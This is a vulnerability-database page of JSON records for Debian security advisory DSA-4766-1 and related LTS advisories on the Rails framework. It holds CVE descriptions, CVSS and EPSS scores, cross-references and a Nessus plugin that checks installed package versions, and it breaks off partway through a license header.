DATABASE RESOURCES PRICING ABOUT US

{"id": "OSV:DSA-4766-1", "bulletinFamily": "software", "title": "rails - security update", "description": "\nMultiple security issues were discovered in the Rails web framework\nwhich could result in cross-site scripting, information leaks, code\nexecution, cross-site request forgery or bypass of upload limits.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2:5.2.2.1+dfsg-1+deb10u2.\n\n\nWe recommend that you upgrade your rails packages.\n\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/rails](https://security-tracker.debian.org/tracker/rails)\n\n\n", "published": "2020-09-24T00:00:00", "modified": "2022-08-10T07:19:11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://osv.dev/vulnerability/DSA-4766-1", "reporter": "Google", "references": ["https://www.debian.org/security/2020/dsa-4766"], "cvelist": ["CVE-2020-8165", "CVE-2020-15169", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8164", "CVE-2020-8162"], "immutableFields": [], "type": "osv", "lastseen": "2022-08-10T07:19:15", "edition": 1, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"idList": ["OSV:DLA-2251-1", "OSV:GHSA-JP5V-5GX4-JMJ9", "OSV:GHSA-XQ5J-GW7F-JGJ8", "OSV:GHSA-8727-M6GJ-MC37", "OSV:GHSA-CFJV-5498-MPH5", "OSV:GHSA-2P68-F74V-9WC6", "OSV:DLA-2403-1", "OSV:DLA-2282-1", "OSV:GHSA-M42X-37P3-FV5W"], "type": "osv"}, {"idList": ["FEDORA:6905030C0EF2", "FEDORA:8116230C0EF7", "FEDORA:92FD1309B6F1", "FEDORA:98F1A30C0EF8", "FEDORA:AF8C030C0EF2", "FEDORA:C779E30C0EFA", "FEDORA:61EBD30BDAB3", "FEDORA:04C8E30BDAB3", "FEDORA:1BE4F30C0EF2", "FEDORA:2DDE030C0EF7", "FEDORA:3313D30C0EF8", "FEDORA:E04FA30C0EFD", "FEDORA:4A6A3309B6F1", "FEDORA:7AD1030BB654"], "type": "fedora"}, {"idList": ["UB:CVE-2020-8162", "UB:CVE-2020-8164", "UB:CVE-2020-8166", "UB:CVE-2020-8165", "UB:CVE-2020-15169", "UB:CVE-2020-8167"], "type": "ubuntucve"}, {"idList": ["GHSA-8727-M6GJ-MC37", "GHSA-XQ5J-GW7F-JGJ8", "GHSA-M42X-37P3-FV5W", "GHSA-CFJV-5498-MPH5", "GHSA-2P68-F74V-9WC6", "GHSA-JP5V-5GX4-JMJ9"], "type": "github"}, {"idList": ["1B4B2D33-DA2D-5E3F-A1A6-FC5997A7558C", "CECC5D54-6258-568A-858F-9209E5656C0D", "3B6A3B39-6E6B-5E2D-8FA8-D34732708B4B", "27155F58-3ADE-564B-A3AA-579D94D79DAE", "78840956-5A47-5CE4-8509-122957977EAB", "DA85122C-5559-534B-9447-C9C43A4CBB65", "60737735-B0CC-556A-96EB-B41ED58C507B"], "type": "githubexploit"}, {"idList": ["RHSA-2021:1313"], "type": "redhat"}, {"idList": ["GITLAB-44D0471EDAE82B4A88EFC08288B8346F", "GITLAB-EB2002D0248799FE42732BEF81E56297", "GITLAB-AB4789FCCC0432BF4300068B9CAB5AD9", "GITLAB-CBBA0EE50F90463CBE67EEFA523D3FCA"], "type": "gitlab"}, {"idList": ["CVE-2020-8165", "CVE-2020-15169", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8164", "CVE-2020-8162"], "type": "cve"}, {"idList": ["FEDORA_2020-4DD34860A3.NASL", "OPENSUSE-2020-1677.NASL", "SUSE_SU-2020-3160-1.NASL", "OPENSUSE-2020-1533.NASL", "OPENSUSE-2020-1536.NASL", "FREEBSD_PKG_7B630362F46811EAA96C08002728F74C.NASL", "DEBIAN_DLA-2403.NASL", "REDHAT-RHSA-2021-1313.NASL", "SUSE_SU-2020-3036-1.NASL", "OPENSUSE-2020-1993.NASL", "OPENSUSE-2020-2000.NASL", "FREEBSD_PKG_85FCA71899F611EABF1D08002728F74C.NASL", "SUSE_SU-2020-3147-1.NASL", "OPENSUSE-2020-1679.NASL", "DEBIAN_DSA-4766.NASL", "DEBIAN_DLA-2251.NASL", "DEBIAN_DLA-2282.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:1361412562310892282", "OPENVAS:1361412562310113713", "OPENVAS:1361412562310113712", "OPENVAS:1361412562310113709", "OPENVAS:1361412562310113714", "OPENVAS:1361412562310892251"], "type": "openvas"}, {"idList": ["H1:732415"], "type": "hackerone"}, {"idList": ["DEBIAN:DLA-2403-1:A426F", "DEBIAN:DLA-2251-1:4D21E", "DEBIAN:DLA-2403-1:8BD9E", "DEBIAN:DLA-2282-1:AA7B9", "DEBIAN:DSA-4766-1:03D2D"], "type": "debian"}, {"idList": ["CPAI-2020-1223"], "type": "checkpoint_advisories"}, {"idList": ["RH:CVE-2020-15169", "RH:CVE-2020-8162", "RH:CVE-2020-8167", "RH:CVE-2020-8164", "RH:CVE-2020-8166", "RH:CVE-2020-8165"], "type": "redhatcve"}, {"idList": ["B9AC236DED8C5D19F13C6F7F060C1F2ECFB7D9164115370343018A74255E2481", "8C90E11DB242E8DC044F905A8987B587D4A711080CE57EFC871310507AC8BF90", "ECC9F68A7B7CDECDFC597F669D0D6D39FA9047BF0CDD8D2EF3C9BE9843D8E63B", "83F53A1D05170BCE5BFE0F61D6B8CDDCC22EADA48AC8EA91C7ABC907D33AA5A1"], "type": "ibm"}, {"idList": ["VERACODE:25454", "VERACODE:26739", "VERACODE:25451", "VERACODE:25453", "VERACODE:25499", "VERACODE:25449"], "type": "veracode"}, {"idList": ["OPENSUSE-SU-2020:1536-1", "OPENSUSE-SU-2020:1533-1", "OPENSUSE-SU-2020:1679-1", "OPENSUSE-SU-2020:1575-1", "OPENSUSE-SU-2020:1677-1", "OPENSUSE-SU-2020:2000-1", "OPENSUSE-SU-2020:1993-1"], "type": "suse"}, {"idList": ["DEBIANCVE:CVE-2020-8162", "DEBIANCVE:CVE-2020-15169", "DEBIANCVE:CVE-2020-8165", "DEBIANCVE:CVE-2020-8166", "DEBIANCVE:CVE-2020-8164", "DEBIANCVE:CVE-2020-8167"], "type": "debiancve"}, {"idList": ["7B630362-F468-11EA-A96C-08002728F74C", "85FCA718-99F6-11EA-BF1D-08002728F74C"], "type": "freebsd"}]}, "score": {"value": 0.3, "vector": "NONE"}, "epss": [{"cve": "CVE-2020-8165", "epss": "0.851190000", "percentile": "0.979220000", "modified": "2023-03-20"}, {"cve": "CVE-2020-15169", "epss": "0.005570000", "percentile": "0.741800000", "modified": "2023-03-20"}, {"cve": "CVE-2020-8166", "epss": "0.001540000", "percentile": "0.499270000", "modified": "2023-03-20"}, {"cve": "CVE-2020-8167", "epss": "0.001540000", "percentile": "0.499440000", "modified": "2023-03-20"}, {"cve": "CVE-2020-8164", "epss": "0.011820000", "percentile": "0.828830000", "modified": "2023-03-20"}, {"cve": "CVE-2020-8162", "epss": "0.001730000", "percentile": "0.527080000", "modified": "2023-03-20"}], "vulnersScore": 0.3}, "_state": {"score": 1684016453, "dependencies": 1660116306, "affected_software_major_version": 1666703109, "epss": 1679338714}, "_internal": {"score_hash": "5340885954e4cc4ec285a53298c0106b"}, "affectedSoftware": [{"name": "rails", "operator": "eq", "version": "2:5.2.2.1+dfsg-1"}, {"name": "rails", "operator": "eq", "version": "2:5.2.2.1+dfsg-1+deb10u1"}]}

{"debian": [{"lastseen": "2023-06-26T14:48:49", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4766-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 24, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2020-8162 CVE-2020-8164 CVE-2020-8165 CVE-2020-8166 \n CVE-2020-8167 CVE-2020-15169\n\nMultiple security issues were discovered in the Rails web framework\nwhich could result in cross-site scripting, information leaks, code\nexecution, cross-site request forgery or bypass of upload limits.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2:5.2.2.1+dfsg-1+deb10u2.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/rails\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-24T20:50:38", "type": "debian", "title": "[SECURITY] [DSA 4766-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-8162", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167"], "modified": "2020-09-24T20:50:38", "id": "DEBIAN:DSA-4766-1:03D2D", "href": "https://lists.debian.org/debian-security-announce/2020/msg00173.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-05T21:19:10", "description": "Package : rails\nVersion : 2:4.1.8-1+deb8u7\nCVE ID : CVE-2020-8164 CVE-2020-8165\n\n\nTwo vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8164\n\n Strong parameters bypass vector in ActionPack. In some cases user\n supplied information can be inadvertently leaked from Strong\n Parameters. Specifically the return value of `each`, or\n `each_value`, or `each_pair` will return the underlying\n &quot;untrusted&quot; hash of data that was read from the parameters.\n Applications that use this return value may be inadvertently use\n untrusted user input.\n\nCVE-2020-8165\n\n Potentially unintended unmarshalling of user-provided objects in\n MemCacheStore. There is potentially unexpected behaviour in the\n MemCacheStore where, when untrusted user input is written to the\n cache store using the `raw: true` parameter, re-reading the result\n from the cache can evaluate the user input as a Marshalled object\n instead of plain text. Unmarshalling of untrusted user input can\n have impact up to and including RCE. At a minimum, this\n vulnerability allows an attacker to inject untrusted Ruby objects\n into a web application.\n\n In addition to upgrading to the latest versions of Rails,\n developers should ensure that whenever they are calling\n `Rails.cache.fetch` they are using consistent values of the `raw`\n parameter for both reading and writing.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n2:4.1.8-1+deb8u7.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-19T17:14:46", "type": "debian", "title": "[SECURITY] [DLA 2251-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164", "CVE-2020-8165"], "modified": "2020-06-19T17:14:46", "id": "DEBIAN:DLA-2251-1:4D21E", "href": "https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-05T21:18:19", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2282-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ \nJuly 20, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : rails\nVersion : 2:4.2.7.1-1+deb9u3\nCVE ID : CVE-2020-8163 CVE-2020-8164 CVE-2020-8165\n\nMultiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8163\n\n A code injection vulnerability in Rails would allow an attacker\n who controlled the `locals` argument of a `render` call to perform\n a RCE.\n\nCVE-2020-8164\n\n A deserialization of untrusted data vulnerability exists in rails\n which can allow an attacker to supply information can be\n inadvertently leaked from Strong Parameters.\n\nCVE-2020-8165\n\n A deserialization of untrusted data vulnernerability exists in\n rails that can allow an attacker to unmarshal user-provided objects\n in MemCacheStore and RedisCacheStore potentially resulting in an\n RCE.\n\nFor Debian 9 stretch, these problems have been fixed in version\n2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/rails\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-20T13:17:33", "type": "debian", "title": "[SECURITY] [DLA 2282-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163", "CVE-2020-8164", "CVE-2020-8165"], "modified": "2020-07-20T13:17:33", "id": "DEBIAN:DLA-2282-1:AA7B9", "href": "https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T10:55:38", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2403-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Markus Koschany\nOctober 09, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : rails\nVersion : 2:4.2.7.1-1+deb9u4\nCVE ID : CVE-2020-15169\nDebian Bug : 970040\n\nA potential Cross-Site Scripting (XSS) vulnerability was found in rails,\na ruby based MVC framework. Views that allow the user to control the\ndefault (not found) value of the `t` and `translate` helpers could be\nsusceptible to XSS attacks. When an HTML-unsafe string is passed as the\ndefault for a missing translation key named html or ending in _html, the\ndefault string is incorrectly marked as HTML-safe and not escaped.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2:4.2.7.1-1+deb9u4.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/rails\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-10-09T18:20:48", "type": "debian", "title": "[SECURITY] [DLA 2403-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-10-09T18:20:48", "id": "DEBIAN:DLA-2403-1:A426F", "href": "https://lists.debian.org/debian-lts-announce/2020/10/msg00015.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-19T17:50:57", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2403-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Markus Koschany\nOctober 09, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : rails\nVersion : 2:4.2.7.1-1+deb9u4\nCVE ID : CVE-2020-15169\nDebian Bug : 970040\n\nA potential Cross-Site Scripting (XSS) vulnerability was found in rails,\na ruby based MVC framework. Views that allow the user to control the\ndefault (not found) value of the `t` and `translate` helpers could be\nsusceptible to XSS attacks. When an HTML-unsafe string is passed as the\ndefault for a missing translation key named html or ending in _html, the\ndefault string is incorrectly marked as HTML-safe and not escaped.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2:4.2.7.1-1+deb9u4.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/rails\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-10-09T18:20:48", "type": "debian", "title": "[SECURITY] [DLA 2403-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-10-09T18:20:48", "id": "DEBIAN:DLA-2403-1:8BD9E", "href": "https://lists.debian.org/debian-lts-announce/2020/10/msg00015.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2023-05-18T15:08:23", "description": "Multiple security issues were discovered in the Rails web framework which could result in cross-site scripting, information leaks, code execution, cross-site request forgery or bypass of upload limits.", "cvss3": {}, "published": "2020-09-25T00:00:00", "type": "nessus", "title": "Debian DSA-4766-1 : rails - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15169", "CVE-2020-8162", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167"], "modified": "2020-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4766.NASL", "href": "https://www.tenable.com/plugins/nessus/140796", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4766. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140796);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/29\");\n\n script_cve_id(\"CVE-2020-15169\", \"CVE-2020-8162\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8166\", \"CVE-2020-8167\");\n script_xref(name:\"DSA\", value:\"4766\");\n\n script_name(english:\"Debian DSA-4766-1 : rails - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple security issues were discovered in the Rails web framework\nwhich could result in cross-site scripting, information leaks, code\nexecution, cross-site request forgery or bypass of upload limits.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4766\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the rails packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 2:5.2.2.1+dfsg-1+deb10u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"rails\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-actioncable\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-actionmailer\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-actionpack\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-actionview\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-activejob\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-activemodel\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-activerecord\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-activestorage\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-activesupport\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-rails\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ruby-railties\", reference:\"2:5.2.2.1+dfsg-1+deb10u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:00:43", "description": "Ruby on Rails blog :\n\nHi everyone! Rails 5.2.4.3 and 6.0.3.1 have been released! These releases contain important security fixes, so please upgrade when you can.\n\nBoth releases contain the following fixes :\n\nCVE-2020-8162: Circumvention of file size limits in ActiveStorage\n\nCVE-2020-8164: Possible Strong Parameters Bypass in ActionPack\n\nCVE-2020-8165: Potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore\n\nCVE-2020-8166: Ability to forge per-form CSRF tokens given a global CSRF token\n\nCVE-2020-8167: CSRF Vulnerability in rails-ujs", "cvss3": {}, "published": "2020-05-20T00:00:00", "type": "nessus", "title": "FreeBSD : Rails -- multiple vulnerabilities (85fca718-99f6-11ea-bf1d-08002728f74c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8162", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167"], "modified": "2020-06-26T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionpack52", "p-cpe:/a:freebsd:freebsd:rubygem-actionpack60", "p-cpe:/a:freebsd:freebsd:rubygem-actionview52", "p-cpe:/a:freebsd:freebsd:rubygem-actionview60", "p-cpe:/a:freebsd:freebsd:rubygem-activestorage52", "p-cpe:/a:freebsd:freebsd:rubygem-activestorage60", "p-cpe:/a:freebsd:freebsd:rubygem-activesupport52", "p-cpe:/a:freebsd:freebsd:rubygem-activesupport60", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_85FCA71899F611EABF1D08002728F74C.NASL", "href": "https://www.tenable.com/plugins/nessus/136726", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, 